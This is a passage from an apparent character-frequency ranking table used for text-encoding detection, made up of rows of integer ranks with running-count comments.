4778,4779,5709,3793,4145,4146,5710, 153,4780, 356,5711,1892,2902,4420,2144, 408, # 5024
803,2357,5712,3933,5713,4421,1646,2578,2518,4781,4782,3934,5714,3935,4422,5715, # 5040
2416,3433, 752,5716,5717,1962,3341,2979,5718, 746,3030,2470,4783,4423,3794, 698, # 5056
4784,1893,4424,3663,2550,4785,3664,3936,5719,3191,3434,5720,1824,1302,4147,2715, # 5072
3937,1974,4425,5721,4426,3192, 823,1303,1288,1236,2861,3542,4148,3435, 774,3938, # 5088
5722,1581,4786,1304,2862,3939,4787,5723,2440,2162,1083,3268,4427,4149,4428, 344, # 5104
1173, 288,2316, 454,1683,5724,5725,1461,4788,4150,2597,5726,5727,4789, 985, 894, # 5120
5728,3436,3193,5729,1914,2942,3795,1989,5730,2111,1975,5731,4151,5732,2579,1194, # 5136
425,5733,4790,3194,1245,3796,4429,5734,5735,2863,5736, 636,4791,1856,3940, 760, # 5152
1800,5737,4430,2212,1508,4792,4152,1894,1684,2298,5738,5739,4793,4431,4432,2213, # 5168
479,5740,5741, 832,5742,4153,2496,5743,2980,2497,3797, 990,3132, 627,1815,2652, # 5184
4433,1582,4434,2126,2112,3543,4794,5744, 799,4435,3195,5745,4795,2113,1737,3031, # 5200
1018, 543, 754,4436,3342,1676,4796,4797,4154,4798,1489,5746,3544,5747,2624,2903, # 5216
4155,5748,5749,2981,5750,5751,5752,5753,3196,4799,4800,2185,1722,5754,3269,3270, # 5232
1843,3665,1715, 481, 365,1976,1857,5755,5756,1963,2498,4801,5757,2127,3666,3271, # 5248
433,1895,2064,2076,5758, 602,2750,5759,5760,5761,5762,5763,3032,1628,3437,5764, # 5264
3197,4802,4156,2904,4803,2519,5765,2551,2782,5766,5767,5768,3343,4804,2905,5769, # 5280
4805,5770,2864,4806,4807,1221,2982,4157,2520,5771,5772,5773,1868,1990,5774,5775, # 5296
5776,1896,5777,5778,4808,1897,4158, 318,5779,2095,4159,4437,5780,5781, 485,5782, # 5312
938,3941, 553,2680, 116,5783,3942,3667,5784,3545,2681,2783,3438,3344,2820,5785, # 5328
3668,2943,4160,1747,2944,2983,5786,5787, 207,5788,4809,5789,4810,2521,5790,3033, # 5344
890,3669,3943,5791,1878,3798,3439,5792,2186,2358,3440,1652,5793,5794,5795, 941, # 5360
2299, 208,3546,4161,2020, 330,4438,3944,2906,2499,3799,4439,4811,5796,5797,5798, # 5376 #last 512
#Everything below is of no interest for detection purpose
2522,1613,4812,5799,3345,3945,2523,5800,4162,5801,1637,4163,2471,4813,3946,5802, # 5392
2500,3034,3800,5803,5804,2195,4814,5805,2163,5806,5807,5808,5809,5810,5811,5812, # 5408
5813,5814,5815,5816,5817,5818,5819,5820,5821,5822,5823,5824,5825,5826,5827,5828, # 5424
5829,5830,5831,5832,5833,5834,5835,5836,5837,5838,5839,5840,5841,5842,5843,5844, # 5440
5845,5846,5847,5848,5849,5850,5851,5852,5853,5854,5855,5856,5857,5858,5859,5860, # 5456
5861,5862,5863,5864,5865,5866,5867,5868,5869,5870,5871,5872,5873,5874,5875,5876, # 5472
5877,5878,5879,5880,5881,5882,5883,5884,5885,5886,5887,5888,5889,5890,5891,5892, # 5488
5893,5894,5895,5896,5897,5898,5899,5900,5901,5902,5903,5904,5905,5906,5907,5908, # 5504
5909,5910,5911,5912,5913,5914,5915,5916,5917,5918,5919,5920,5921,5922,5923,5924, # 5520
5925,5926,5927,5928,5929,5930,5931,5932,5933,5934,5935,5936,5937,5938,5939,5940, # 5536
5941,5942,5943,5944,5945,5946,5947,5948,5949,5950,5951,5952,5953,5954,5955,5956, # 5552
5957,5958,5959,5960,5961,5962,5963,5964,5965,5966,5967,5968,5969,5970,5971,5972, # 5568
5973,5974,5975,5976,5977,5978,5979,5980,5981,5982,5983,5984,5985,5986,5987,5988, # 5584
5989,5990,5991,5992,5993,5994,5995,5996,5997,5998,5999,6000,6001,6002,6003,6004, # 5600
6005,6006,6007,6008,6009,6010,6011,6012,6013,6014,6015,6016,6017,6018,6019,6020, # 5616
6021,6022,6023,6024,6025,6026,6027,6028,6029,6030,6031,6032,6033,6034,6035,6036, # 5632
6037,6038,6039,6040,6041,6042,6043,6044,6045,6046,6047,6048,6049,6050,6051,6052, # 5648
6053,6054,6055,6056,6057,6058,6059,6060,6061,6062,6063,6064,6065,6066,6067,6068, # 5664
6069,6070,6071,6072,6073,6074,6075,6076,6077,6078,6079,6080,6081,6082,6083,6084, # 5680
6085,6086,6087,6088,6089,6090,6091,6092,6093,6094,6095,6096,6097,6098,6099,6100, # 5696
6101,6102,6103,6104,6105,6106,6107,6108,6109,6110,6111,6112,6113,6114,6115,6116, # 5712
6117,6118,6119,6120,6121,6122,6123,6124,6125,6126,6127,6128,6129,6130,6131,6132, # 5728
6133,6134,6135,6136,6137,6138,6139,6140,6141,6142,6143,6144,6145,6146,6147,6148, # 5744
6149,6150,6151,6152,6153,6154,6155,6156,6157,6158,6159,6160,6161,6162,6163,6164, # 5760
6165,6166,6167,6168,6169,6170,6171,6172,6173,6174,6175,6176,6177,6178,6179,6180, # 5776
6181,6182,6183,6184,6185,6186,6187,6188,6189,6190,6191,6192,6193,6194,6195,6196, # 5792
6197,6198,6199,6200,6201,6202,6203,6204,6205,6206,6207,6208,6209,6210,6211,6212, # 5808
6213,6214,6215,6216,6217,6218,6219,6220,6221,6222,6223,3670,6224,6225,6226,6227, # 5824
6228,6229,6230,6231,6232,6233,6234,6235,6236,6237,6238,6239,6240,6241,6242,6243, # 5840
6244,6245,6246,6247,6248,6249,6250,6251,6252,6253,6254,6255,6256,6257,6258,6259, # 5856
6260,6261,6262,6263,6264,6265,6266,6267,6268,6269,6270,6271,6272,6273,6274,6275, # 5872
6276,6277,6278,6279,6280,6281,6282,6283,6284,6285,4815,6286,6287,6288,6289,6290, # 5888
6291,6292,4816,6293,6294,6295,6296,6297,6298,6299,6300,6301,6302,6303,6304,6305, # 5904
6306,6307,6308,6309,6310,6311,4817,4818,6312,6313,6314,6315,6316,6317,6318,4819, # 5920
6319,6320,6321,6322,6323,6324,6325,6326,6327,6328,6329,6330,6331,6332,6333,6334, # 5936
6335,6336,6337,4820,6338,6339,6340,6341,6342,6343,6344,6345,6346,6347,6348,6349, # 5952
6350,6351,6352,6353,6354,6355,6356,6357,6358,6359,6360,6361,6362,6363,6364,6365, # 5968
6366,6367,6368,6369,6370,6371,6372,6373,6374,6375,6376,6377,6378,6379,6380,6381, # 5984
6382,6383,6384,6385,6386,6387,6388,6389,6390,6391,6392,6393,6394,6395,6396,6397, # 6000
6398,6399,6400,6401,6402,6403,6404,6405,6406,6407,6408,6409,6410,3441,6411,6412, # 6016
6413,6414,6415,6416,6417,6418,6419,6420,6421,6422,6423,6424,6425,4440,6426,6427, # 6032
6428,6429,6430,6431,6432,6433,6434,6435,6436,6437,6438,6439,6440,6441,6442,6443, # 6048
6444,6445,6446,6447,6448,6449,6450,6451,6452,6453,6454,4821,6455,6456,6457,6458, # 6064
6459,6460,6461,6462,6463,6464,6465,6466,6467,6468,6469,6470,6471,6472,6473,6474, # 6080
6475,6476,6477,3947,3948,6478,6479,6480,6481,3272,4441,6482,6483,6484,6485,4442, # 6096
6486,6487,6488,6489,6490,6491,6492,6493,6494,6495,6496,4822,6497,6498,6499,6500, # 6112
6501,6502,6503,6504,6505,6506,6507,6508,6509,6510,6511,6512,6513,6514,6515,6516, # 6128
6517,6518,6519,6520,6521,6522,6523,6524,6525,6526,6527,6528,6529,6530,6531,6532, # 6144
6533,6534,6535,6536,6537,6538,6539,6540,6541,6542,6543,6544,6545,6546,6547,6548, # 6160
6549,6550,6551,6552,6553,6554,6555,6556,2784,6557,4823,6558,6559,6560,6561,6562, # 6176
6563,6564,6565,6566,6567,6568,6569,3949,6570,6571,6572,4824,6573,6574,6575,6576, # 6192
6577,6578,6579,6580,6581,6582,6583,4825,6584,6585,6586,3950,2785,6587,6588,6589, # 6208
6590,6591,6592,6593,6594,6595,6596,6597,6598,6599,6600,6601,6602,6603,6604,6605, # 6224
6606,6607,6608,6609,6610,6611,6612,4826,6613,6614,6615,4827,6616,6617,6618,6619, # 6240
6620,6621,6622,6623,6624,6625,4164,6626,6627,6628,6629,6630,6631,6632,6633,6634, # 6256
3547,6635,4828,6636,6637,6638,6639,6640,6641,6642,3951,2984,6643,6644,6645,6646, # 6272
6647,6648,6649,4165,6650,4829,6651,6652,4830,6653,6654,6655,6656,6657,6658,6659, # 6288
6660,6661,6662,4831,6663,6664,6665,6666,6667,6668,6669,6670,6671,4166,6672,4832, # 6304
3952,6673,6674,6675,6676,4833,6677,6678,6679,4167,6680,6681,6682,3198,6683,6684, # 6320
6685,6686,6687,6688,6689,6690,6691,6692,6693,6694,6695,6696,6697,4834,6698,6699, # 6336
6700,6701,6702,6703,6704,6705,6706,6707,6708,6709,6710,6711,6712,6713,6714,6715, # 6352
6716,6717,6718,6719,6720,6721,6722,6723,6724,6725,6726,6727,6728,6729,6730,6731, # 6368
6732,6733,6734,4443,6735,6736,6737,6738,6739,6740,6741,6742,6743,6744,6745,4444, # 6384
6746,6747,6748,6749,6750,6751,6752,6753,6754,6755,6756,6757,6758,6759,6760,6761, # 6400
6762,6763,6764,6765,6766,6767,6768,6769,6770,6771,6772,6773,6774,6775,6776,6777, # 6416
6778,6779,6780,6781,4168,6782,6783,3442,6784,6785,6786,6787,6788,6789,6790,6791, # 6432
4169,6792,6793,6794,6795,6796,6797,6798,6799,6800,6801,6802,6803,6804,6805,6806, # 6448
6807,6808,6809,6810,6811,4835,6812,6813,6814,4445,6815,6816,4446,6817,6818,6819, # 6464
6820,6821,6822,6823,6824,6825,6826,6827,6828,6829,6830,6831,6832,6833,6834,6835, # 6480
3548,6836,6837,6838,6839,6840,6841,6842,6843,6844,6845,6846,4836,6847,6848,6849, # 6496
6850,6851,6852,6853,6854,3953,6855,6856,6857,6858,6859,6860,6861,6862,6863,6864, # 6512
6865,6866,6867,6868,6869,6870,6871,6872,6873,6874,6875,6876,6877,3199,6878,6879, # 6528
6880,6881,6882,4447,6883,6884,6885,6886,6887,6888,6889,6890,6891,6892,6893,6894, # 6544
6895,6896,6897,6898,6899,6900,6901,6902,6903,6904,4170,6905,6906,6907,6908,6909, # 6560
6910,6911,6912,6913,6914,6915,6916,6917,6918,6919,6920,6921,6922,6923,6924,6925, # 6576
6926,6927,4837,6928,6929,6930,6931,6932,6933,6934,6935,6936,3346,6937,6938,4838, # 6592
6939,6940,6941,4448,6942,6943,6944,6945,6946,4449,6947,6948,6949,6950,6951,6952, # 6608
6953,6954,6955,6956,6957,6958,6959,6960,6961,6962,6963,6964,6965,6966,6967,6968, # 6624
6969,6970,6971,6972,6973,6974,6975,6976,6977,6978,6979,6980,6981,6982,6983,6984, # 6640
6985,6986,6987,6988,6989,6990,6991,6992,6993,6994,3671,6995,6996,6997,6998,4839, # 6656
6999,7000,7001,7002,3549,7003,7004,7005,7006,7007,7008,7009,7010,7011,7012,7013, # 6672
7014,7015,7016,7017,7018,7019,7020,7021,7022,7023,7024,7025,7026,7027,7028,7029, # 6688
7030,4840,7031,7032,7033,7034,7035,7036,7037,7038,4841,7039,7040,7041,7042,7043, # 6704
7044,7045,7046,7047,7048,7049,7050,7051,7052,7053,7054,7055,7056,7057,7058,7059, # 6720
7060,7061,7062,7063,7064,7065,7066,7067,7068,7069,7070,2985,7071,7072,7073,7074, # 6736
7075,7076,7077,7078,7079,7080,4842,7081,7082,7083,7084,7085,7086,7087,7088,7089, # 6752
7090,7091,7092,7093,7094,7095,7096,7097,7098,7099,7100,7101,7102,7103,7104,7105, # 6768
7106,7107,7108,7109,7110,7111,7112,7113,7114,7115,7116,7117,7118,4450,7119,7120, # 6784
7121,7122,7123,7124,7125,7126,7127,7128,7129,7130,7131,7132,7133,7134,7135,7136, # 6800
7137,7138,7139,7140,7141,7142,7143,4843,7144,7145,7146,7147,7148,7149,7150,7151, # 6816
7152,7153,7154,7155,7156,7157,7158,7159,7160,7161,7162,7163,7164,7165,7166,7167, # 6832
7168,7169,7170,7171,7172,7173,7174,7175,7176,7177,7178,7179,7180,7181,7182,7183, # 6848
7184,7185,7186,7187,7188,4171,4172,7189,7190,7191,7192,7193,7194,7195,7196,7197, # 6864
7198,7199,7200,7201,7202,7203,7204,7205,7206,7207,7208,7209,7210,7211,7212,7213, # 6880
7214,7215,7216,7217,7218,7219,7220,7221,7222,7223,7224,7225,7226,7227,7228,7229, # 6896
7230,7231,7232,7233,7234,7235,7236,7237,7238,7239,7240,7241,7242,7243,7244,7245, # 6912
7246,7247,7248,7249,7250,7251,7252,7253,7254,7255,7256,7257,7258,7259,7260,7261, # 6928
7262,7263,7264,7265,7266,7267,7268,7269,7270,7271,7272,7273,7274,7275,7276,7277, # 6944
7278,7279,7280,7281,7282,7283,7284,7285,7286,7287,7288,7289,7290,7291,7292,7293, # 6960
7294,7295,7296,4844,7297,7298,7299,7300,7301,7302,7303,7304,7305,7306,7307,7308, # 6976
7309,7310,7311,7312,7313,7314,7315,7316,4451,7317,7318,7319,7320,7321,7322,7323, # 6992
7324,7325,7326,7327,7328,7329,7330,7331,7332,7333,7334,7335,7336,7337,7338,7339, # 7008
7340,7341,7342,7343,7344,7345,7346,7347,7348,7349,7350,7351,7352,7353,4173,7354, # 7024
7355,4845,7356,7357,7358,7359,7360,7361,7362,7363,7364,7365,7366,7367,7368,7369, # 7040
7370,7371,7372,7373,7374,7375,7376,7377,7378,7379,7380,7381,7382,7383,7384,7385, # 7056
7386,7387,7388,4846,7389,7390,7391,7392,7393,7394,7395,7396,7397,7398,7399,7400, # 7072
7401,7402,7403,7404,7405,3672,7406,7407,7408,7409,7410,7411,7412,7413,7414,7415, # 7088
7416,7417,7418,7419,7420,7421,7422,7423,7424,7425,7426,7427,7428,7429,7430,7431, # 7104
7432,7433,7434,7435,7436,7437,7438,7439,7440,7441,7442,7443,7444,7445,7446,7447, # 7120
7448,7449,7450,7451,7452,7453,4452,7454,3200,7455,7456,7457,7458,7459,7460,7461, # 7136
7462,7463,7464,7465,7466,7467,7468,7469,7470,7471,7472,7473,7474,4847,7475,7476, # 7152
7477,3133,7478,7479,7480,7481,7482,7483,7484,7485,7486,7487,7488,7489,7490,7491, # 7168
7492,7493,7494,7495,7496,7497,7498,7499,7500,7501,7502,3347,7503,7504,7505,7506, # 7184
7507,7508,7509,7510,7511,7512,7513,7514,7515,7516,7517,7518,7519,7520,7521,4848, # 7200
7522,7523,7524,7525,7526,7527,7528,7529,7530,7531,7532,7533,7534,7535,7536,7537, # 7216
7538,7539,7540,7541,7542,7543,7544,7545,7546,7547,7548,7549,3801,4849,7550,7551, # 7232
7552,7553,7554,7555,7556,7557,7558,7559,7560,7561,7562,7563,7564,7565,7566,7567, # 7248
7568,7569,3035,7570,7571,7572,7573,7574,7575,7576,7577,7578,7579,7580,7581,7582, # 7264
7583,7584,7585,7586,7587,7588,7589,7590,7591,7592,7593,7594,7595,7596,7597,7598, # 7280
7599,7600,7601,7602,7603,7604,7605,7606,7607,7608,7609,7610,7611,7612,7613,7614, # 7296
7615,7616,4850,7617,7618,3802,7619,7620,7621,7622,7623,7624,7625,7626,7627,7628, # 7312
7629,7630,7631,7632,4851,7633,7634,7635,7636,7637,7638,7639,7640,7641,7642,7643, # 7328
7644,7645,7646,7647,7648,7649,7650,7651,7652,7653,7654,7655,7656,7657,7658,7659, # 7344
7660,7661,7662,7663,7664,7665,7666,7667,7668,7669,7670,4453,7671,7672,7673,7674, # 7360
7675,7676,7677,7678,7679,7680,7681,7682,7683,7684,7685,7686,7687,7688,7689,7690, # 7376
7691,7692,7693,7694,7695,7696,7697,3443,7698,7699,7700,7701,7702,4454,7703,7704, # 7392
7705,7706,7707,7708,7709,7710,7711,7712,7713,2472,7714,7715,7716,7717,7718,7719, # 7408
7720,7721,7722,7723,7724,7725,7726,7727,7728,7729,7730,7731,3954,7732,7733,7734, # 7424
7735,7736,7737,7738,7739,7740,7741,7742,7743,7744,7745,7746,7747,7748,7749,7750, # 7440
3134,7751,7752,4852,7753,7754,7755,4853,7756,7757,7758,7759,7760,4174,7761,7762, # 7456
7763,7764,7765,7766,7767,7768,7769,7770,7771,7772,7773,7774,7775,7776,7777,7778, # 7472
7779,7780,7781,7782,7783,7784,7785,7786,7787,7788,7789,7790,7791,7792,7793,7794, # 7488
7795,7796,7797,7798,7799,7800,7801,7802,7803,7804,7805,4854,7806,7807,7808,7809, # 7504
7810,7811,7812,7813,7814,7815,7816,7817,7818,7819,7820,7821,7822,7823,7824,7825, # 7520
4855,7826,7827,7828,7829,7830,7831,7832,7833,7834,7835,7836,7837,7838,7839,7840, # 7536
7841,7842,7843,7844,7845,7846,7847,3955,7848,7849,7850,7851,7852,7853,7854,7855, # 7552
7856,7857,7858,7859,7860,3444,7861,7862,7863,7864,7865,7866,7867,7868,7869,7870, # 7568
7871,7872,7873,7874,7875,7876,7877,7878,7879,7880,7881,7882,7883,7884,7885,7886, # 7584
7887,7888,7889,7890,7891,4175,7892,7893,7894,7895,7896,4856,4857,7897,7898,7899, # 7600
7900,2598,7901,7902,7903,7904,7905,7906,7907,7908,4455,7909,7910,7911,7912,7913, # 7616
7914,3201,7915,7916,7917,7918,7919,7920,7921,4858,7922,7923,7924,7925,7926,7927, # 7632
7928,7929,7930,7931,7932,7933,7934,7935,7936,7937,7938,7939,7940,7941,7942,7943, # 7648
7944,7945,7946,7947,7948,7949,7950,7951,7952,7953,7954,7955,7956,7957,7958,7959, # 7664
7960,7961,7962,7963,7964,7965,7966,7967,7968,7969,7970,7971,7972,7973,7974,7975, # 7680
7976,7977,7978,7979,7980,7981,4859,7982,7983,7984,7985,7986,7987,7988,7989,7990, # 7696
7991,7992,7993,7994,7995,7996,4860,7997,7998,7999,8000,8001,8002,8003,8004,8005, # 7712
8006,8007,8008,8009,8010,8011,8012,8013,8014,8015,8016,4176,8017,8018,8019,8020, # 7728
8021,8022,8023,4861,8024,8025,8026,8027,8028,8029,8030,8031,8032,8033,8034,8035, # 7744
8036,4862,4456,8037,8038,8039,8040,4863,8041,8042,8043,8044,8045,8046,8047,8048, # 7760
8049,8050,8051,8052,8053,8054,8055,8056,8057,8058,8059,8060,8061,8062,8063,8064, # 7776
8065,8066,8067,8068,8069,8070,8071,8072,8073,8074,8075,8076,8077,8078,8079,8080, # 7792
8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,8096, # 7808
8097,8098,8099,4864,4177,8100,8101,8102,8103,8104,8105,8106,8107,8108,8109,8110, # 7824
8111,8112,8113,8114,8115,8116,8117,8118,8119,8120,4178,8121,8122,8123,8124,8125, # 7840
8126,8127,8128,8129,8130,8131,8132,8133,8134,8135,8136,8137,8138,8139,8140,8141, # 7856
8142,8143,8144,8145,4865,4866,8146,8147,8148,8149,8150,8151,8152,8153,8154,8155, # 7872
8156,8157,8158,8159,8160,8161,8162,8163,8164,8165,4179,8166,8167,8168,8169,8170, # 7888
8171,8172,8173,8174,8175,8176,8177,8178,8179,8180,8181,4457,8182,8183,8184,8185, # 7904
8186,8187,8188,8189,8190,8191,8192,8193,8194,8195,8196,8197,8198,8199,8200,8201, # 7920
8202,8203,8204,8205,8206,8207,8208,8209,8210,8211,8212,8213,8214,8215,8216,8217, # 7936
8218,8219,8220,8221,8222,8223,8224,8225,8226,8227,8228,8229,8230,8231,8232,8233, # 7952
8234,8235,8236,8237,8238,8239,8240,8241,8242,8243,8244,8245,8246,8247,8248,8249, # 7968
8250,8251,8252,8253,8254,8255,8256,3445,8257,8258,8259,8260,8261,8262,4458,8263, # 7984
8264,8265,8266,8267,8268,8269,8270,8271,8272,4459,8273,8274,8275,8276,3550,8277, # 8000
8278,8279,8280,8281,8282,8283,8284,8285,8286,8287,8288,8289,4460,8290,8291,8292, # 8016
8293,8294,8295,8296,8297,8298,8299,8300,8301,8302,8303,8304,8305,8306,8307,4867, # 8032
8308,8309,8310,8311,8312,3551,8313,8314,8315,8316,8317,8318,8319,8320,8321,8322, # 8048
8323,8324,8325,8326,4868,8327,8328,8329,8330,8331,8332,8333,8334,8335,8336,8337, # 8064
8338,8339,8340,8341,8342,8343,8344,8345,8346,8347,8348,8349,8350,8351,8352,8353, # 8080
8354,8355,8356,8357,8358,8359,8360,8361,8362,8363,4869,4461,8364,8365,8366,8367, # 8096
8368,8369,8370,4870,8371,8372,8373,8374,8375,8376,8377,8378,8379,8380,8381,8382, # 8112
8383,8384,8385,8386,8387,8388,8389,8390,8391,8392,8393,8394,8395,8396,8397,8398, # 8128
8399,8400,8401,8402,8403,8404,8405,8406,8407,8408,8409,8410,4871,8411,8412,8413, # 8144
8414,8415,8416,8417,8418,8419,8420,8421,8422,4462,8423,8424,8425,8426,8427,8428, # 8160
8429,8430,8431,8432,8433,2986,8434,8435,8436,8437,8438,8439,8440,8441,8442,8443, # 8176
8444,8445,8446,8447,8448,8449,8450,8451,8452,8453,8454,8455,8456,8457,8458,8459, # 8192
8460,8461,8462,8463,8464,8465,8466,8467,8468,8469,8470,8471,8472,8473,8474,8475, # 8208
8476,8477,8478,4180,8479,8480,8481,8482,8483,8484,8485,8486,8487,8488,8489,8490, # 8224
8491,8492,8493,8494,8495,8496,8497,8498,8499,8500,8501,8502,8503,8504,8505,8506, # 8240
8507,8508,8509,8510,8511,8512,8513,8514,8515,8516,8517,8518,8519,8520,8521,8522, # 8256
8523,8524,8525,8526,8527,8528,8529,8530,8531,8532,8533,8534,8535,8536,8537,8538, # 8272
8539,8540,8541,8542,8543,8544,8545,8546,8547,8548,8549,8550,8551,8552,8553,8554, # 8288
8555,8556,8557,8558,8559,8560,8561,8562,8563,8564,4872,8565,8566,8567,8568,8569, # 8304
8570,8571,8572,8573,4873,8574,8575,8576,8577,8578,8579,8580,8581,8582,8583,8584, # 8320
8585,8586,8587,8588,8589,8590,8591,8592,8593,8594,8595,8596,8597,8598,8599,8600, # 8336
8601,8602,8603,8604,8605,3803,8606,8607,8608,8609,8610,8611,8612,8613,4874,3804, # 8352
8614,8615,8616,8617,8618,8619,8620,8621,3956,8622,8623,8624,8625,8626,8627,8628, # 8368
8629,8630,8631,8632,8633,8634,8635,8636,8637,8638,2865,8639,8640,8641,8642,8643, # 8384
8644,8645,8646,8647,8648,8649,8650,8651,8652,8653,8654,8655,8656,4463,8657,8658, # 8400
8659,4875,4876,8660,8661,8662,8663,8664,8665,8666,8667,8668,8669,8670,8671,8672, # 8416
8673,8674,8675,8676,8677,8678,8679,8680,8681,4464,8682,8683,8684,8685,8686,8687, # 8432
8688,8689,8690,8691,8692,8693,8694,8695,8696,8697,8698,8699,8700,8701,8702,8703, # 8448
8704,8705,8706,8707,8708,8709,2261,8710,8711,8712,8713,8714,8715,8716,8717,8718, # 8464
8719,8720,8721,8722,8723,8724,8725,8726,8727,8728,8729,8730,8731,8732,8733,4181, # 8480
8734,8735,8736,8737,8738,8739,8740,8741,8742,8743,8744,8745,8746,8747,8748,8749, # 8496
8750,8751,8752,8753,8754,8755,8756,8757,8758,8759,8760,8761,8762,8763,4877,8764, # 8512
8765,8766,8767,8768,8769,8770,8771,8772,8773,8774,8775,8776,8777,8778,8779,8780, # 8528
8781,8782,8783,8784,8785,8786,8787,8788,4878,8789,4879,8790,8791,8792,4880,8793, # 8544
8794,8795,8796,8797,8798,8799,8800,8801,4881,8802,8803,8804,8805,8806,8807,8808, # 8560
8809,8810,8811,8812,8813,8814,8815,3957,8816,8817,8818,8819,8820,8821,8822,8823, # 8576
8824,8825,8826,8827,8828,8829,8830,8831,8832,8833,8834,8835,8836,8837,8838,8839, # 8592
8840,8841,8842,8843,8844,8845,8846,8847,4882,8848,8849,8850,8851,8852,8853,8854, # 8608
8855,8856,8857,8858,8859,8860,8861,8862,8863,8864,8865,8866,8867,8868,8869,8870, # 8624
8871,8872,8873,8874,8875,8876,8877,8878,8879,8880,8881,8882,8883,8884,3202,8885, # 8640
8886,8887,8888,8889,8890,8891,8892,8893,8894,8895,8896,8897,8898,8899,8900,8901, # 8656
8902,8903,8904,8905,8906,8907,8908,8909,8910,8911,8912,8913,8914,8915,8916,8917, # 8672
8918,8919,8920,8921,8922,8923,8924,4465,8925,8926,8927,8928,8929,8930,8931,8932, # 8688
4883,8933,8934,8935,8936,8937,8938,8939,8940,8941,8942,8943,2214,8944,8945,8946, # 8704
8947,8948,8949,8950,8951,8952,8953,8954,8955,8956,8957,8958,8959,8960,8961,8962, # 8720
8963,8964,8965,4884,8966,8967,8968,8969,8970,8971,8972,8973,8974,8975,8976,8977, # 8736
8978,8979,8980,8981,8982,8983,8984,8985,8986,8987,8988,8989,8990,8991,8992,4885, # 8752
8993,8994,8995,8996,8997,8998,8999,9000,9001,9002,9003,9004,9005,9006,9007,9008, # 8768
9009,9010,9011,9012,9013,9014,9015,9016,9017,9018,9019,9020,9021,4182,9022,9023, # 8784
9024,9025,9026,9027,9028,9029,9030,9031,9032,9033,9034,9035,9036,9037,9038,9039, # 8800
9040,9041,9042,9043,9044,9045,9046,9047,9048,9049,9050,9051,9052,9053,9054,9055, # 8816
9056,9057,9058,9059,9060,9061,9062,9063,4886,9064,9065,9066,9067,9068,9069,4887, # 8832
9070,9071,9072,9073,9074,9075,9076,9077,9078,9079,9080,9081,9082,9083,9084,9085, # 8848
9086,9087,9088,9089,9090,9091,9092,9093,9094,9095,9096,9097,9098,9099,9100,9101, # 8864
9102,9103,9104,9105,9106,9107,9108,9109,9110,9111,9112,9113,9114,9115,9116,9117, # 8880
9118,9119,9120,9121,9122,9123,9124,9125,9126,9127,9128,9129,9130,9131,9132,9133, # 8896
9134,9135,9136,9137,9138,9139,9140,9141,3958,9142,9143,9144,9145,9146,9147,9148, # 8912
9149,9150,9151,4888,9152,9153,9154,9155,9156,9157,9158,9159,9160,9161,9162,9163, # 8928
9164,9165,9166,9167,9168,9169,9170,9171,9172,9173,9174,9175,4889,9176,9177,9178, # 8944
9179,9180,9181,9182,9183,9184,9185,9186,9187,9188,9189,9190,9191,9192,9193,9194, # 8960
9195,9196,9197,9198,9199,9200,9201,9202,9203,4890,9204,9205,9206,9207,9208,9209, # 8976
9210,9211,9212,9213,9214,9215,9216,9217,9218,9219,9220,9221,9222,4466,9223,9224, # 8992
9225,9226,9227,9228,9229,9230,9231,9232,9233,9234,9235,9236,9237,9238,9239,9240, # 9008
9241,9242,9243,9244,9245,4891,9246,9247,9248,9249,9250,9251,9252,9253,9254,9255, # 9024
9256,9257,4892,9258,9259,9260,9261,4893,4894,9262,9263,9264,9265,9266,9267,9268, # 9040
9269,9270,9271,9272,9273,4467,9274,9275,9276,9277,9278,9279,9280,9281,9282,9283, # 9056
9284,9285,3673,9286,9287,9288,9289,9290,9291,9292,9293,9294,9295,9296,9297,9298, # 9072
9299,9300,9301,9302,9303,9304,9305,9306,9307,9308,9309,9310,9311,9312,9313,9314, # 9088
9315,9316,9317,9318,9319,9320,9321,9322,4895,9323,9324,9325,9326,9327,9328,9329, # 9104
9330,9331,9332,9333,9334,9335,9336,9337,9338,9339,9340,9341,9342,9343,9344,9345, # 9120
9346,9347,4468,9348,9349,9350,9351,9352,9353,9354,9355,9356,9357,9358,9359,9360, # 9136
9361,9362,9363,9364,9365,9366,9367,9368,9369,9370,9371,9372,9373,4896,9374,4469, # 9152
9375,9376,9377,9378,9379,4897,9380,9381,9382,9383,9384,9385,9386,9387,9388,9389, # 9168
9390,9391,9392,9393,9394,9395,9396,9397,9398,9399,9400,9401,9402,9403,9404,9405, # 9184
9406,4470,9407,2751,9408,9409,3674,3552,9410,9411,9412,9413,9414,9415,9416,9417, # 9200
9418,9419,9420,9421,4898,9422,9423,9424,9425,9426,9427,9428,9429,3959,9430,9431, # 9216
9432,9433,9434,9435,9436,4471,9437,9438,9439,9440,9441,9442,9443,9444,9445,9446, # 9232
9447,9448,9449,9450,3348,9451,9452,9453,9454,9455,9456,9457,9458,9459,9460,9461, # 9248
9462,9463,9464,9465,9466,9467,9468,9469,9470,9471,9472,4899,9473,9474,9475,9476, # 9264
9477,4900,9478,9479,9480,9481,9482,9483,9484,9485,9486,9487,9488,3349,9489,9490, # 9280
9491,9492,9493,9494,9495,9496,9497,9498,9499,9500,9501,9502,9503,9504,9505,9506, # 9296
9507,9508,9509,9510,9511,9512,9513,9514,9515,9516,9517,9518,9519,9520,4901,9521, # 9312
9522,9523,9524,9525,9526,4902,9527,9528,9529,9530,9531,9532,9533,9534,9535,9536, # 9328
9537,9538,9539,9540,9541,9542,9543,9544,9545,9546,9547,9548,9549,9550,9551,9552, # 9344
9553,9554,9555,9556,9557,9558,9559,9560,9561,9562,9563,9564,9565,9566,9567,9568, # 9360
9569,9570,9571,9572,9573,9574,9575,9576,9577,9578,9579,9580,9581,9582,9583,9584, # 9376
3805,9585,9586,9587,9588,9589,9590,9591,9592,9593,9594,9595,9596,9597,9598,9599, # 9392
9600,9601,9602,4903,9603,9604,9605,9606,9607,4904,9608,9609,9610,9611,9612,9613, # 9408
9614,4905,9615,9616,9617,9618,9619,9620,9621,9622,9623,9624,9625,9626,9627,9628, # 9424
9629,9630,9631,9632,4906,9633,9634,9635,9636,9637,9638,9639,9640,9641,9642,9643, # 9440
4907,9644,9645,9646,9647,9648,9649,9650,9651,9652,9653,9654,9655,9656,9657,9658, # 9456
9659,9660,9661,9662,9663,9664,9665,9666,9667,9668,9669,9670,9671,9672,4183,9673, # 9472
9674,9675,9676,9677,4908,9678,9679,9680,9681,4909,9682,9683,9684,9685,9686,9687, # 9488
9688,9689,9690,4910,9691,9692,9693,3675,9694,9695,9696,2945,9697,9698,9699,9700, # 9504
9701,9702,9703,9704,9705,4911,9706,9707,9708,9709,9710,9711,9712,9713,9714,9715, # 9520
